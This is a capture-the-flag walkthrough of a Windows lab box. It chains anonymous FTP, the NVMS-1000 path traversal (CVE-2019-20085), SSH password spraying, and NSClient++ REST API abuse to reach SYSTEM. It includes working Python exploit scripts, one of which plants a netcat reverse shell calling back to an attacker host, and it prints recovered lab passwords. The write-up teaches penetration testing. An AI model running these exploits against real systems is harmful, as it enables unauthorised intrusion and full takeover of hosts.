Easy Windows machine that chains four misconfigurations together. Anonymous FTP leaks an internal note
revealing that Passwords.txt lives on Nathan's Desktop. NVMS-1000's unauthenticated path
traversal (CVE-2019-20085) reads that file without any credentials. Password spraying over SSH lands a
shell as nadine. NSClient++ — a monitoring agent running as NT AUTHORITY\SYSTEM
— stores its API password in plaintext; forwarding its port via SSH tunnel and registering a malicious
script through the REST API yields a SYSTEM shell.
User Flag
2687b43660xxxxxxxxxxxxxxxxxxxxxx
Root Flag
27da63c023xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance
Full port scan surfaces anonymous FTP, SSH, HTTP (NVMS-1000), SMB, and an HTTPS service on 8443 (NSClient++).
nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.227.77
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed
22/tcp   open  ssh           OpenSSH for_Windows_8.0
80/tcp   open  http          redirects to /Pages/login.htm (NVMS-1000)
445/tcp  open  microsoft-ds  Windows Server
8443/tcp open  https         NSClient++ web UI
NVMS-1000 is a network video surveillance management system by TVT with a known unauthenticated directory traversal (CVE-2019-20085) that reads arbitrary files without credentials.
NSClient++ is a Windows monitoring agent similar to Nagios NRPE. It runs as NT AUTHORITY\SYSTEM and can execute external scripts via a REST API — a classic privesc target.
02 FTP Enumeration
Anonymous FTP allows browsing both user home directories. Two files leak the entire attack path.
ftp — anonymous login
$ ftp -p 10.129.227.77
# Username: anonymous   Password: (blank)
ftp> cd Users/Nadine
ftp> get Confidential.txt
ftp> cd ../Nathan
ftp> get "Notes to do.txt"
Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once
you have edited it yourself and place it back into the secure folder.

Regards,
Nadine
Notes to do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS <-- NOT done
5) Place the secret files in SharePoint
key insight: Passwords.txt sits on Nathan's Desktop, and NVMS is still publicly reachable (item 4 was never done). The NVMS traversal can therefore read that file without any credentials.
03 Directory Traversal — CVE-2019-20085
NVMS-1000 does not sanitize ../ sequences in the request path, so an unauthenticated client can read any file the service account can reach. Most public Python PoCs are built on requests/urllib3, which resolves ../ segments client-side before the request leaves the machine; the payload never reaches the server and the exploit simply appears not to work. Send the raw path instead, for example with curl --path-as-is.
Why --path-as-is? By default curl (and most HTTP libraries) normalize URLs and strip ../ before sending. This flag disables normalization and sends the raw path exactly as written — required for the traversal payload to reach the server intact.
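To make the normalization problem concrete, here is an added example (mine, not part of the original writeup or of any published PoC). It implements the dot-segment removal that curl and urllib3 apply by default, showing what happens to the payload, and then builds the HTTP request by hand over a plain socket so that no URL parser can touch the path, which is exactly what curl --path-as-is does. The target address comes from the page; the traversal depth (six ../) and the full path C:\Users\Nathan\Desktop\Passwords.txt are my assumptions based on the note that the file is on Nathan's Desktop. The equivalent one-liner is curl --path-as-is "http://10.129.227.77/../../../../../../Users/Nathan/Desktop/Passwords.txt".

```python
"""Added example: why CVE-2019-20085 needs an un-normalized path, and one
way to guarantee it. Not code from the original writeup.

Assumed: target 10.129.227.77:80 (from the page) and the file path
C:\\Users\\Nathan\\Desktop\\Passwords.txt (the page only says 'Desktop').
"""
import socket

TARGET_HOST = "10.129.227.77"   # from the writeup
TARGET_PORT = 80
# Six ../ is enough to reach the drive root from any realistic web-root depth.
TRAVERSAL = "/../../../../../../Users/Nathan/Desktop/Passwords.txt"


def remove_dot_segments(path: str) -> str:
    """Dot-segment removal for an absolute path (RFC 3986 section 5.2.4,
    simplified). This is what curl (by default) and urllib3/requests do to
    the path before sending. Applied to TRAVERSAL it quietly yields
    /Users/Nathan/Desktop/Passwords.txt, which the web root does not contain,
    so the 'exploit' fails with no error at all."""
    if not path.startswith("/"):
        raise ValueError("expected an absolute path")
    stack = []
    for segment in path.split("/")[1:]:
        if segment == "..":
            if stack:
                stack.pop()
        elif segment != ".":
            stack.append(segment)
    return "/" + "/".join(stack)


def build_raw_request(path: str, host: str = TARGET_HOST) -> bytes:
    """Hand-built HTTP/1.1 request; the path is copied verbatim, which is
    the behaviour curl --path-as-is gives you."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def read_file_via_traversal(path: str = TRAVERSAL, host: str = TARGET_HOST,
                            port: int = TARGET_PORT, timeout: float = 5.0) -> bytes:
    """Send the raw request over a socket and return the response body.
    Needs network reachability to the target; not used by the offline test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_raw_request(path, host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    raw = b"".join(chunks)
    header, _, body = raw.partition(b"\r\n\r\n")
    status_line = header.split(b"\r\n", 1)[0]
    if b" 200 " not in status_line:
        raise RuntimeError(f"traversal rejected: {status_line!r}")
    return body


if __name__ == "__main__":
    print("after normalization:", remove_dot_segments(TRAVERSAL))  # payload gone
    print("raw request line   :", build_raw_request(TRAVERSAL).split(b"\r\n")[0].decode())
    print(read_file_via_traversal().decode(errors="replace"))
```

The check worth keeping from this: if a traversal PoC "does nothing", print the request line that actually went on the wire (a proxy such as Burp shows it) before assuming the target is patched.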
04 Foothold — SSH as Nadine
Spray the recovered passwords against both known users over SSH.
finding: the file is Nathan's own password list, yet none of its entries work for nathan over SSH. Nadine reused one of them (L1k3B1gBut7s@W0rk), so the spray lands a shell as nadine instead.
SSH → user flag
$ ssh nadine@10.129.227.77
# Password: L1k3B1gBut7s@W0rk
nadine@SERVMON C:\Users\Nadine\Desktop> type user.txt
2687b43660xxxxxxxxxxxxxxxxxxxxxx
user flag obtained.
05 Privilege Escalation — NSClient++ → SYSTEM
NSClient++ is bound to 0.0.0.0:8443 but its config restricts API connections to 127.0.0.1 only.
The config also stores the API password in plaintext. We bypass the localhost restriction with an SSH tunnel,
then use the REST API to register and execute a reverse shell script — the service runs as SYSTEM.
Step 1 — Read nsclient.ini
nsclient.ini — credentials
nadine> type "C:\Program Files\NSClient++\nsclient.ini"
password = ew2x6SsGTxjRwXOT
allowed hosts = 127.0.0.1
TLS gotcha: NSClient++ 0.5.2 uses old TLS. Pass -k (skip cert verification) and --tlsv1.0. Run all API calls from Kali — the Windows curl inside the SSH session uses schannel and also fails on SSL errors.
# terminal 1 — listener
$ nc -lvnp 4444

# terminal 2 — execute the registered script
$ curl -k --tlsv1.0 -u admin:ew2x6SsGTxjRwXOT \
    "https://127.0.0.1:8443/api/v1/queries/evil/commands/execute?time=3m"

# shell received on the listener:
connect to [10.10.14.78] from (UNKNOWN) [10.129.227.77]
C:\Program Files\NSClient++> whoami
nt authority\system
Why does this work? NSClient++ runs as a Windows service under NT AUTHORITY\SYSTEM. When it executes the registered script, the spawned process inherits that SYSTEM context — no further exploitation needed.
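The writeup shows the final execute call but not the steps in between (bringing the API to 127.0.0.1 and registering the script). The following is an added example of the whole exchange, written by me and not taken from the writeup or from NSClient++ itself. It assumes: the tunnel is already up with ssh -L 8443:127.0.0.1:8443 nadine@10.129.227.77, so the API sees a 127.0.0.1 source and the allowed hosts setting is satisfied; a netcat binary was copied to C:\Temp\nc.exe over the same SSH access; the script-upload endpoint /api/v1/scripts/ext/scripts/<name> is taken from the NSClient++ 0.5.x REST API (it is not on the page), while the execute endpoint is the one the page uses. Credentials and the listener address come from the page.

```python
"""Added example: driving the NSClient++ 0.5.2 REST API through the SSH
tunnel to register and run a script as NT AUTHORITY\\SYSTEM. Not code from
the original writeup.

Assumed (not on the page): tunnel ssh -L 8443:127.0.0.1:8443 already open,
nc.exe present at C:\\Temp\\nc.exe on the target, and the scripts upload
endpoint as documented for NSClient++ 0.5.x.
"""
import base64
import http.client
import ssl

API_HOST, API_PORT = "127.0.0.1", 8443            # local end of the SSH tunnel
API_USER, API_PASS = "admin", "ew2x6SsGTxjRwXOT"  # password from nsclient.ini
ATTACKER_HOST, ATTACKER_PORT = "10.10.14.78", 4444  # listener from the writeup


def basic_auth(user: str, password: str) -> str:
    """Authorization header value; the legacy web server accepts the API
    password from nsclient.ini as the password for the user 'admin'."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def reverse_shell_bat(lhost: str, lport: int, nc_path: str = r"C:\Temp\nc.exe") -> str:
    """Batch file body NSClient++ will run as SYSTEM (nc_path is assumed)."""
    return f"@echo off\r\n{nc_path} {lhost} {lport} -e cmd.exe\r\n"


def script_path(name: str) -> str:
    """PUT target: the file lands in the scripts\\ directory and a query of
    the same name is registered (assumed endpoint, see lead-in)."""
    return f"/api/v1/scripts/ext/scripts/{name}.bat"


def execute_path(name: str, keepalive: str = "3m") -> str:
    """The page's execute endpoint; ?time= keeps the call open long enough
    for the spawned shell to connect back before the job is reaped."""
    return f"/api/v1/queries/{name}/commands/execute?time={keepalive}"


def make_tls_context() -> ssl.SSLContext:
    """Equivalent of curl -k --tlsv1.0: skip certificate checks and allow the
    old TLS version the bundled web server negotiates."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    try:
        ctx.set_ciphers("DEFAULT:@SECLEVEL=0")  # OpenSSL refuses TLS 1.0 at its default level
    except ssl.SSLError:
        pass  # LibreSSL builds do not know SECLEVEL; minimum_version still applies
    return ctx


def api_request(method: str, path: str, body=None):
    """One authenticated call to the tunnelled API; returns (status, body)."""
    conn = http.client.HTTPSConnection(API_HOST, API_PORT, context=make_tls_context(), timeout=15)
    headers = {"Authorization": basic_auth(API_USER, API_PASS)}
    if body is not None:
        headers["Content-Type"] = "application/octet-stream"
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, data


def upload_script(name: str, content: str):
    return api_request("PUT", script_path(name), content.encode())


def execute_query(name: str, keepalive: str = "3m"):
    return api_request("GET", execute_path(name, keepalive))


if __name__ == "__main__":
    # Start `nc -lvnp 4444` on the attacker box before running this.
    print(upload_script("evil", reverse_shell_bat(ATTACKER_HOST, ATTACKER_PORT)))
    print(execute_query("evil"))
```

Two things to verify on a real run: the upload response should acknowledge the new script, and GET /api/v1/queries (same auth) should list evil before you fire it; if it does not, the script was written to disk but not registered, and the execute call will return an error rather than a shell.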
06 Root Flag
root flag
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
27da63c023xxxxxxxxxxxxxxxxxxxxxx